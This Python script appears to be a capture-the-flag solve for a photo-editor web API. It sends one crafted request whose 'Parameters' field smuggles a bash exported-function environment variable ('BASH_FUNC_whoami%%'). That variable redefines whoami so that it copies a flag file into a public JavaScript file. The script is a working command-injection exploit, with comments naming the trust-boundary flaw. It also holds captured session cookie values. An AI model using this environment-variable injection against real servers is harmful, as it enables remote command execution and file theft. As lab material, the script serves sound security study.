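#!/usr/bin/env python3
"""Solve script: POST one crafted EditImage request and print the reply.

Reads a base64 image blob from the local file ``b64``, sends it together with
a ``Parameters`` map to ``/api/DynamicPhotoEditor/EditImage`` on the target,
then prints the HTTP status, the raw body, and the decoded ``base64Blob``
field of the JSON reply.

Usage: ``solve [BASEURL]`` (defaults to ``http://localhost:1024``).
"""

from base64 import b64decode

import requests
import sys

# Cookie and header values captured from a browser session against the local
# instance. The two cookie values are session-specific captures; presumably
# the endpoint does not validate them -- confirm before relying on that.
cookies = {
    '_streamlit_xsrf': '2|9690aa7c|65f1b6483b23d4f268aaa1bc37107645|1713379145',
    'ajs_anonymous_id': '41f17fef-5f83-4be5-a144-1bcfd22fd984',
}

# NOTE: Origin/Referer are pinned to localhost:1024 even when a different
# BASEURL is given on the command line; they are kept as captured.
headers = {
    'Accept': 'application/json, text/javascript, */*; q=0.01',
    'Accept-Language': 'en-US,en;q=0.9',
    'Cache-Control': 'no-cache',
    'Connection': 'keep-alive',
    'Content-Type': 'application/json',
    'Origin': 'http://localhost:1024',
    'Pragma': 'no-cache',
    'Referer': 'http://localhost:1024/',
    'Sec-Fetch-Dest': 'empty',
    'Sec-Fetch-Mode': 'cors',
    'Sec-Fetch-Site': 'same-origin',
    'Sec-GPC': '1',
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36',
    'X-Requested-With': 'XMLHttpRequest',
    'sec-ch-ua': '"Brave";v="123", "Not:A-Brand";v="8", "Chromium";v="123"',
    'sec-ch-ua-mobile': '?0',
    'sec-ch-ua-platform': '"Linux"',
}

# Read the blob before any network traffic so a missing or unreadable "b64"
# fails early, and close the handle deterministically (the bare open() left
# it to the garbage collector).
with open("b64") as blob_file:
    base64_blob = blob_file.read().strip()

# Request body. 'Parameters' is a client-controlled map of environment-style
# keys; the BASH_FUNC_whoami%% entry uses bash's exported-function syntax,
# which suggests the server copies these keys unchanged into a child
# process's environment and that the GetUsername action runs whoami there.
# From the application's side that request-field -> environment-variable
# trust boundary is the defect to fix (allow-list the keys a client may set).
json_data = {
    'Base64Blob': base64_blob,
    'DynamicAction': 'GetUsername',
    'Parameters': '[{"PATH": "/usr/bin", "BASH_FUNC_whoami%%": "() { cat /App/flag > /App/wwwroot/js/flag.js; }"}]',
    'Types': ["System.Collections.Generic.Dictionary`2[System.String,System.String]"],
}

baseurl = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:1024"
response = requests.post(
    f'{baseurl}/api/DynamicPhotoEditor/EditImage',
    cookies=cookies,
    headers=headers,
    json=json_data,
    # Without a timeout an unresponsive target hangs the script forever.
    timeout=30,
)
print(response.status_code)
print(response.text)

# A non-JSON reply (error page, proxy response) used to surface as a
# traceback from .json(); report it and exit non-zero instead. The raw body
# has already been printed above, so nothing is lost.
try:
    body = response.json()
except ValueError as err:
    sys.exit(f"response is not JSON: {err}")

blob = body.get("base64Blob") if isinstance(body, dict) else None
if blob is None:
    sys.exit("response JSON has no 'base64Blob' field")
print(b64decode(blob))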